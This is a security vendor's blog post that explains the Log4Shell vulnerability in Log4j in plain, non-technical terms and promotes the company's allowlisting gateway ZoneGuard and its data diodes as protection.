In December 2021, a vulnerability was found in the Java module Log4j. This vulnerability was called Log4Shell. There are ways to protect yourself against this type of vulnerability – in this blog post, we will tell you how.
What is Log4Shell?
The Log4Shell vulnerability found in Log4j is an example of what is called “improper input validation”. A computer program should never trust the input parameters given to the program unless it can be absolutely sure that the parameters come from a reliable source.
The Log4j is a Java module used by developers when they want to print or write data from the program. This is common for debugging purposes but can also be for generating audit logs or writing other various types of information, for example to a file or to the output console. Using what in Log4j is called “lookups”, it is possible for the one who supplied the data to decide how this data is formatted, what it contains and where the data can be found. The scariest part is that Log4j can also be made to execute data formatted according to JNDI (Java Naming and Directory Interface).
How can this be exploited practically?
There are many ways for this vulnerability to be exploited. For example, assume that there is a typical authentication page where you are expected to enter your username and password. Now, for debugging purposes, the programmer who developed the authentication functionality used Log4j to generate a log containing the username. However, instead of entering the username, the attacker enters a JNDI formatted string. Usage of JNDI gives the attacker the possibility to affect the vulnerable system, in worst case executing software like a malware.
How could this type of attack be prevented?
Allowlisting
There are ways to protect yourself against these kinds of threats. One could think that a firewall could protect your network by only allowing certain traffic to enter it. A firewall monitors and filters what packets enter the network, and which are blocked based on rule setups. However, if you need to transfer information to or from a security sensitive network a firewall should not be the only solution you choose.
If you have security sensitive or even classified information, you need a viable Cross Domain Solution that offers secure and filtered bidirectional communication. The purpose is to apply strict information-level control during information transfers and mitigate cybersecurity threats such as manipulation, data leakage and intrusion. What should be used is something called allowlisting. The word allowlisting refers to the method of listing what is authorised, instead of blocking the known bad. An allowlistlist only needs to be updated when you need a new feature in the system. Allowlisting means that you can plan your updating without suddenly facing the need to make an urgent update based on events outside your control.
Advenica products provide strong segmentation and information aware validation of data flows. Advenica’s Cross Domain Solution, ZoneGuard, only allows data flows and connections explicitly configured and allowlisted and would have blocked the connection to the server with the malicious code. ZoneGuard could also, due to its information awareness property, had blocked the JNDI string entered by the attacker and prevented the attack.
ZoneGuard allows for a strictly controlled two-way filtered information flow supporting third party controls for enforcing a digitally signed information policy. It uses filters in both directions and information is always controlled using full message inspection. The filter can allow information to pass depending on several factors e.g. source/destination addresses, file formats, attributes or the presence of a digital signature.
Segmentation
Also, strong segmentation and true defence-in-depth should always be applied to protect your critical assets, using e.g. a data diode. Data diodes are the failsafe way to protect sensitive systems and confidential data. They are small hardware devices, also called “unidirectional security gateways”, which sit between two networks. Working like a check valve, the function of a data diode is to allow all data to pass in the forward direction, while blocking all data in the reverse direction.
A data diode can replicate those parts of your application that you need to expose on the internet. A successful attack using Log4Shell, or other unpublished (as of this writing) vulnerabilities could have negative impact on your web application, but the data diode would very efficiently protect your critical information and systems. Preventing bidirectional traffic and thus stopping any attempt at communicating with the sensitive system.
This will not be the last time an incident like this occurs. Would you like to make sure that you are ready for future threats? Contact us!
Do you want to know more about Advenica? Read more here!